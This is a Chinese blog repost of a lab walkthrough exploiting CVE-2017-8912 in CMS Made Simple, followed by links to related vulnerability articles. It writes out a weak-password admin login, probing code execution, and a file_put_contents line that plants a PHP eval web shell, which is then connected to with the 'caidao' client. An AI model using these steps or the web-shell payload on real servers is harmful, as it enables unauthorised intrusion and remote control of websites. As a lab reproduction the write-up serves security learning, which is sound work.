CVE-2017-8912 CMS Made Simple命令执行

最新推荐文章于 2024-07-06 19:12:42 发布
最新推荐文章于 2024-07-06 19:12:42 发布
阅读量145 收藏
点赞数
文章标签: php 后端
原文链接:http://www.cnblogs.com/whatiwhere/p/9000239.html
版权

CVE-2017-8912 CMS Made Simple命令执行

1)了解命令执行漏洞,并且能够从源码中发现。

2)用eval处理函数,并且过滤不严导致命令执行。

实验步骤

1.1)登录网站1221970-20180506225857331-710958675.jpg

1.2)进入admin后台弱口令登入1221970-20180506225911216-455507640.jpg

1.3)找到能够添加的地址![1.3)1221970-20180506225919205-76655562.jpg

1.4)点击submit提交后 点击设置项

1221970-20180506225928618-1991257538.jpg

1.5)点击run后可以看到命令被执行当前中间件的权限是system

1221970-20180506225937415-757892798.jpg

1.6)更改code区域测试是否回显

在code区域填写[system ('net user')]查看当前用户,第一次还是出现whoami的结果,关掉后再提交一次,发现并没有回显,此时并不清楚命令是否执行是否成功,在分别测试【ipconfig,systeminfo,ping 127.0.0.1,dir 】等命令后均没有回显,猜测后端过滤了一些东西
1221970-20180506230002029-299780493.jpg

1.7)测试发现php函数能够成功执行1221970-20180506230016766-444836189.jpg

1.8)PHP函数可以执行,那就利用phpinfo();执行两次后,查看当前网站的绝对路径,执行可以看到phpinfo页面,可以获得网站根路径为【c:/phpStudy/WWW】1221970-20180506230031973-27448561.jpg

1.9)利用php的【file_put_contents()】来写入一句话。在code区域写入【file_put_contents('c://phpStudy//WWW//1.php' ,' <?php eval($_POST[1]);?>' ,FILE_APPEND);】1221970-20180506230140233-611037974.jpg

提交两次成功写入一句话木马
1221970-20180506230158357-1918763228.jpg

1.11)使用caidao写入配置进行链接1221970-20180506230206824-1099573491.jpg

1.12)使用caidao进行虚拟终端1221970-20180506230215182-1664877133.jpg

1.13)成功获取到目录1221970-20180506230223483-1859073349.jpg

转载于:https://www.cnblogs.com/whatiwhere/p/9000239.html

mysql5.5.53 cve_CVE-2018-1000094-CMSMS 2.2.5代码执行漏洞
weixin_39963819的博客
02-18 761
0x01 前言CMS Made Simple是一个简单易于使用的内容管理系统。它使用PHP,MySQL和Smarty模板引擎开发。昨天看漏洞库的时候看到这一款CMS,漏洞操作也挺简单的,但是可以申请CVE,于是乎就复现了一篇过程和写漏洞脚本。0x02 环境下载下来是一个安装文件cmsms-2.2.5-install.php,浏览器直接打开默认Next,到数据库连接这一块要先创建一个数据库,我这里创...
CMS Made Simple(CMSMS) v2.2.5
11-26
CMS Made Simple(CMSMS)是一个简单易于使用的内容管理系统,使用PHP,MySQL和Smarty模板引擎开发,具有基于角色的权限管理系统,智能缓存机制(只有当需要时才会从数据库获取),基于向导的
4大CMS 平台: Drupal, eZ Publish, WordPress, CMS Made Simple 横向比较
COMSHARP CMS 专栏
06-04 5391
世界上没有最好的 CMS,只有最适合的,最近的 DrupalCamp 大会在芬兰赫尔辛基召开,一家叫 Exove 当地公司提供了一个演示,对四大 CMS 平台,Drupal, WordPress, eZ Publish and CMS Made Simple 进行了一次横向比较。Drupal vs. WordPressWordPress 有它的优势,它已经超越了一个博客
CMS Made Simple (CMSMS) 前台代码执行漏洞(CVE-2021-26120)
shierbai的博客
06-19 690
因此,如果CMSMS版本低于2.2.9.1,未授权的攻击者可以结合[CVE-2019-9053](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2019-9053)和CVE-2021-26120漏洞,在服务器上执行任意代码。根据页面中的安装向导来进行,其中MySQL数据库的地址是`db`,数据库名是`cmsms`,账号和密码均为`root`搭建环境访问`http://your-ip/install.php`并安装cms服务。
优秀的轻量级内容管理系统: CMS Made Simple
不论你在什么时候开始,重要的是开始之后就不要停止。
01-10 1795
CMS Made Simple (简称CMSMS) 是一款轻量级的内容管理系统,旨在为静态内容为主的小型门户网站提供最简单最轻松的架站体验。CMSMS 以不限深度的树型结构来组织内容,符合大部分场合的信息结构。这些内容通常是相对静态的,其内容、结构和访问方式不随着时间的推移而改变。相比于早期的 HTML 静态页面组织方式,采用CMS系统可以把它们方便组织起来,便于维护。而且采用 CMS 可以将
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
04-08
总结:CMS Made Simple系统的前台SQL注入漏洞CVE-2019-9053是一个严重的信息安全漏洞,攻击者可以利用该漏洞对系统进行非法操作,比如获取管理密码和执行代码。了解此类漏洞的原理和复现方法对于开发者和安全专家都...
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
04-08
CMS Made Simple前台代码执行漏洞 CVE-2021-26120 漏洞背景 CMS Made SimpleCMSMS)是一个免费且开源的内容管理系统(CMS),面向开发人员、程序员和网站所有者提供网页开发和管理功能。CMSMS 使用 Smarty 模板...
CVE-2021-31956 POC
03-14
NTFS驱动堆溢出漏洞(CVE-2021-31956,)利用程序,用于本地权限提升。
CMS Made Simple 2.2.9.1前台代码执行漏洞CVE-2021-26120:任意代码执行风险
CMS Made Simple (CMSMS) 是一款开源内容管理系统,专为网站开发者和管理员提供在线内容管理和开发工具。然而,在2021年发布的CVE-2021-26120漏洞中,存在一个关键的安全问题。这个漏洞出现在Smarty3.1.39及更早版本...
CMS Made Simple CMSMS内容管理系统 v2.2.15
11-03
为您提供CMS Made Simple CMSMS内容管理系统下载,CMS Made Simple(CMSMS)是一个简单易于使用的内容管理系统,使用PHP,MySQL和...使用CMS Made Simple(CMSMS)搭建一个站点,就如同它的名字—简单,但是对于那些热衷于
CMS Made Simple中文入门教程
12-09
CMS Made Simple是一个流行的、功能强大的内容管理系统程序,本教程详细介绍了CMS Made Simple的安装以及后台的操作使用,内容详细,并且配有图解。
mobiledetect:使用 Mobile_Detect PHP 类进行设备检测的 CMS Made Simple 插件
06-17
移动侦测 Mobiledetect 是一个用于 CMS Made Simple System 的 Smarty 插件,使用由 Serban Ghita 编写的 Mobile_Detect PHP 类。 有关 Mobile_Detect 类的更多信息,您可以访问 ,如果您觉得缺少某些检测、发现错误或想为 Mobile_Detect 项目做出贡献,您可以在上找到它。 来自 Mobile_Detect 项目的描述: “Mobile_Detect 是一个用于检测移动设备(包括平板电脑)的轻量级 PHP 类。它使用 User-Agent 字符串结合特定的 HTTP 标头来检测移动环境。” 我如何使用它? 下载 function.mobiledetect.php 文件后,您应该将其上传到“plugins”文件夹内的 CMSMS 文件夹中。 文件上传后,您可以通过调用{mobiledetect} S
CMS Made Simple (CMSMS) < 2.2.10 前台SQL注入漏洞(CVE-2019-9053)
shierbai的博客
05-26 696
结合后台的 SSTI 漏洞([CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)),攻击者可在目标服务器上执行任意代码。安装过程请根据页面中的安装向导来进行,其中MySQL数据库的地址是`db`,数据库名是`cmsms`,账号和密码均为`root`。使用中的脚本来利用SQL注入漏洞。
CMS Made Simple v2.2.15 远程命令执行漏洞(CVE-2022-23906)
最新发布
Flag少侠的博客
07-06 9463
打开靶场进入靶场页面如下点击链接登录弱口令爆破得到:admin/123456找到上传文件的地方这里尝试直接上传 PHP 不行,得上传图片可以看到有一个重命名选项将后缀名改为 PHP提示无效,不让改再尝试 copy重命名为 PHP 文件成功!!!退出 images 目录即可看到木马文件右键复制链接地址蚁剑测试连接拿到 flag。
CMS Made Simple v2.2.15 RCE(CVE-2022-23906)
qq_69432323的博客
07-23 1328
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
vedas靶机渗透攻略
weixin_47311099的博客
01-13 845
信息收集 nmap扫描 nmap -sC -sV 192.168.93.0/24 -p- ​ 目标192.168.93.135 开放22ssh 80http 网站信息收集 首页没啥东西 目录爆破也没啥,22端口爆破太费劲… ​ 扫描udp协议 tcp没思路,扫扫udp nmap -sU -sV 192.168.93.135 68dhcp没啥用,161snmp倒是有点意思 ​ ​ ​ msf探测snmp信息 search snmp ​ use 25 发现一个flag,并提示去root的方式 一串
【打靶练习】vulnhub: my-cmsms
守拙的博客
04-10 852
弱口令、代码审计、信息收集
20+个最好的CMS内容管理系统
weixin_33888907的博客
03-08 1109
为什么80%的码农都做不了架构师?>>> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值